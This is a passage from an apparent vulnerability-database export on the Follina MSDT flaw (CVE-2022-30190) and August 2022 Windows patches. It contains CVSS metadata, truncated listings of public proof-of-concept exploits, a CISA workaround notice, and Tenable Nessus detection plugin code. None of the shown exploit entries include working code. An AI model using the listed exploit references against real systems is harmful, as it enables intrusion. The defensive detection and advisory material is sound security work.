"REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-03T00:25:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-25T10:24:05", "id": "221070D3-0B31-5CF7-A508-B4740B63647B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-27T05:15:40", "description": "[...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-19T18:09:47", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-27T02:19:43", "id": "DD36D028-7FB1-5824-9756-09BA3927DCEE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:57:37", "description": "# CVE-2022-30190\n\nCVE-2022-30190\nCVE-2022-30190 Follina POC\n\nHos...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T07:01:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T07:03:36", "id": "9CB70E27-04CC-50BC-9F3E-2907ABA654EA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-24T12:19:34", "description": "# FollinaScanner\nA tool written in Go that scans files & directo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T06:45:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-24T11:52:03", "id": "FD6B81DE-3BFF-5BC7-BD1F-E90103B8FBEF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-07T02:34:47", "description": "# follina_cve_2022-30190\nA proof of concept to CVE-2022-30190 (f...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-10T14:57:17", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-27T02:17:48", "id": "BAA0F684-952E-5B9E-B207-0419A33AC53B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "cisa": [{"lastseen": "2022-06-03T13:56:12", "description": "Microsoft has released workaround guidance to address a remote code execution (RCE) vulnerability\u2014CVE-2022-30190, known as \"Follina\"\u2014affecting the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. Microsoft has reported active exploitation of this vulnerability in the wild.\n\nCISA urges users and administrators to review Microsoft's [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) and apply the necessary workaround. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "cisa", "title": "Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "CISA:F30D0D7B72453DC3FC64D2AC1AA31F33", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-08-01T18:57:16", "description": "The remote host has the HKEY_CLASSES_ROOT\\ms-msdt registry key. This is a known exposure for CVE-2022-30190.\n\nNote that Nessus has not tested for CVE-2022-30190. It is only checking if the registry key exists. The recommendation is to apply the latest patch.", "cvss3": {}, "published": "2022-05-31T00:00:00", "type": "nessus", "title": "The Microsoft Windows Support Diagnostic Tool (MSDT) RCE Workaround Detection (CVE-2022-30190)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-28T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*", "x-cpe:2.3:a:microsoft:msdt:*:*:*:*:*:*:*:*"], "id": "MSDT_RCE_CVE_2022-30190_REG_CHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/161691", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161691);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/28\");\n\n script_name(english:\"The Microsoft Windows Support Diagnostic Tool (MSDT) RCE Workaround Detection (CVE-2022-30190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Checks for the HKEY_CLASSES_ROOT\\ms-msdt registry key.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has the HKEY_CLASSES_ROOT\\ms-msdt registry key. This is a known exposure for CVE-2022-30190.\n\nNote that Nessus has not tested for CVE-2022-30190. It is only checking if the registry key exists. The recommendation is\nto apply the latest patch.\");\n # https://community.tenable.com/s/article/Microsoft-CVE-2022-30190-Patch-and-Workaround-Plugin-Advisement\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?440e4ba1\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\");\n # https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9345997\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the latest Cumulative Update.\");\n\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:microsoft:msdt\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_windows_defender_win_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\ninclude('smb_reg_query.inc');\ninclude('spad_log_func.inc');\ninclude('smb_func.inc');\n\nregistry_init();\nvar hkcr = registry_hive_connect(hive:HKEY_CLASS_ROOT, exit_on_fail:TRUE);\n\nif (!registry_key_exists(handle:hkcr, key:'ms-msdt'))\n{\n spad_log(message:'HKEY_CLASSES_ROOT\\\\ms-msdt does not exist, auditing');\n close_registry();\n audit(AUDIT_OS_CONF_NOT_VULN, 'Windows');\n}\n\nvar report = 'The HKEY_CLASSES_ROOT\\\\ms-msdt registry key exists on the target. This may indicate that the target is' +\n ' vulnerable to CVE-2022-30190, if the vendor patch is not applied.';\n\nvar port = kb_smb_transport();\nclose_registry();\nsecurity_report_v4(severity:SECURITY_NOTE, extra:report, port:port);\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:27:36", "description": "The remote Windows host is missing security update 5016679. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016679: Windows 7 and Windows Server 2008 R2 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30194", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35747", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35793", "CVE-2022-35795", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016679.NASL", "href": "https://www.tenable.com/plugins/nessus/163952", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163952);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30194\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35747\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35756\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35793\",\n \"CVE-2022-35795\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016676\");\n script_xref(name:\"MSKB\", value:\"5016679\");\n script_xref(name:\"MSFT\", value:\"MS22-5016676\");\n script_xref(name:\"MSFT\", value:\"MS22-5016679\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016679: Windows 7 and Windows Server 2008 R2 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016679. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016676\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016679\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016676\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016679\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016679 or Cumulative Update 5016676\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016679',\n '5016676'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016679, 5016676])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:25:58", "description": "The remote Windows host is missing security update 5016684. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016684: Windows Server 2012 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30194", "CVE-2022-33670", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35793", "CVE-2022-35795", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016684.NASL", "href": "https://www.tenable.com/plugins/nessus/163948", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163948);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30194\",\n \"CVE-2022-33670\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35756\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35793\",\n \"CVE-2022-35795\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016672\");\n script_xref(name:\"MSKB\", value:\"5016684\");\n script_xref(name:\"MSFT\", value:\"MS22-5016672\");\n script_xref(name:\"MSFT\", value:\"MS22-5016684\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016684: Windows Server 2012 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016684. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016672\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016684\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016672\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016684\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016684 or Cumulative Update 5016672\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016684',\n '5016672'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016684, 5016672])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:26:49", "description": "The remote Windows host is missing security update 5016683. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not 